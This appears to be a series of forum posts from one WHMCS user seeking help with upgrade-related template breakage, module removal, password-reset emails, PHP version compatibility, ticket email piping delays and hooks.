Thanks for the explanation. I really prefer the Modern for my business and in fact have just given up my server. I use this as my primary invoicing program for my all clients. The hosting was always a small amount of this. Just managed to wipe out my saved correct password for whmcs so got to get back in to go further. Thanks so very much for your complete answer! I did just upgrade to 7.8 as prompted. Now I see other problems. I have always hated WHCMS for the upgrades and now the easier one-click ones are still a problem. Way too much work but kinda stuck in it now.

I went to support immediately when this happened because it's a repeat of earlier this year. I have a branded six template with few custom changes. The first time it was determined that the template had stored something in the database that upgrading doesn't change and support was able to tell me exactly where to look. This time they brushed me off twice and told me to switch to the default six instead. Uh, folks, branding is important and I have no desire to totally redo the whole thing - messaging and all. Last March I pushed all six files to my custom template which did not fix that problem. So how in the h... do I figure out where the problem is? I have one that I need to completely remove ( SSL Store) and I have contacted support for that one to see if they have any instructions but I do need to know for future references about uninstalling modules. Just deactivating this one leaves all 8 (!) tables in the database and all products - over 70 are still activated. I can of course deactivate them by running an ssl query on one of the tables but what is the usual process for this? Shouldn't the company provide a removal script? I know where the files are and the 8 tables but is there anything else in other tables I need to worry about?

I had already checked the system health and had neglected the php compatibility bit but still using 5.6 and wasn't worried. That might be why the tool returned an error just now. Thanks.

okay, then I assume that's fixed now! The log says the reset mail was sent. Thanks so much for the quick response! Hopefully that's the only issue. It does make me wonder what other time bombs I got in the database though. Any way to find out what else might need tweaking due to many upgrades over the years?

Only the reset password is failing - everything else seems to be okay. I did not change email templates at all ever so am working off the default one from years ago. So I have no idea what to change (or why it became necessary all of sudden). Upgraded to newest whcms in March and just ran into problems last week - but php settings may have changed as we identified another issue on the server that we have not figured out yet. That looks to be a php error about cookies? Appreciate any assistance. If not logged in, you can access the products but clicking on the next button nothing happens. There is a slowly turning arrow next to the title of Order Summary. Help!

I got that done but whm only has ioncube available in php7.1. Present version of WHMCS 7.4.2 flakes out when I switch from 5.6 to 7.1. I can no longer access whmcs - it's in a folder and it sends me back to root. Do I have to do a manual upgrade? Could I have upgrade issues if I do since this seems just plain odd?

piping - had to reset up everything after that update. FYI, the ticket has not posted yet so even my one thought on this has proved incorrect. I don't understand why there has been so much issue with his emails at all.

For some reason I'm getting the emails (as these are forwarded to my regular email address) long before the ticket replies show up in the ticket. I have few people that create tickets and this one customer has always had an issue with me getting those forwarded emails. Now I get the email but the ticket doesn't show the reply for a long time. Right now the email is 2 hours old. The last one finally did show up later. I do have piping set up correctly and it was working before. There is nothing in my Ticket Mail Import Log since I upgraded back in July. Obviously something is still not right but I can't imagine what. The cron job is set up to run every 5 minutes. I do seem to be getting the new ticket created notices (that's what wasn't happening before with this one customer).

Twas a legitimate question - I need the answer. I've not used hooks before with WHMCS and I've read through the documentation and have failed. I simply am trying to remove links from the top bar. Found that code and put it into a file named hooks.php and placed it in the modules folder. Now, if I've read the directions incorrectly, I would love to know it because that didn't work. That's with copying the exact hook code from the edit menu links page - which is the announcements link. Nothing happened. Please illuminate. I am a experienced designer, developer and write documentation for this kind of thing. Not a newbie, folks - maybe a tired pro but not a newbie.
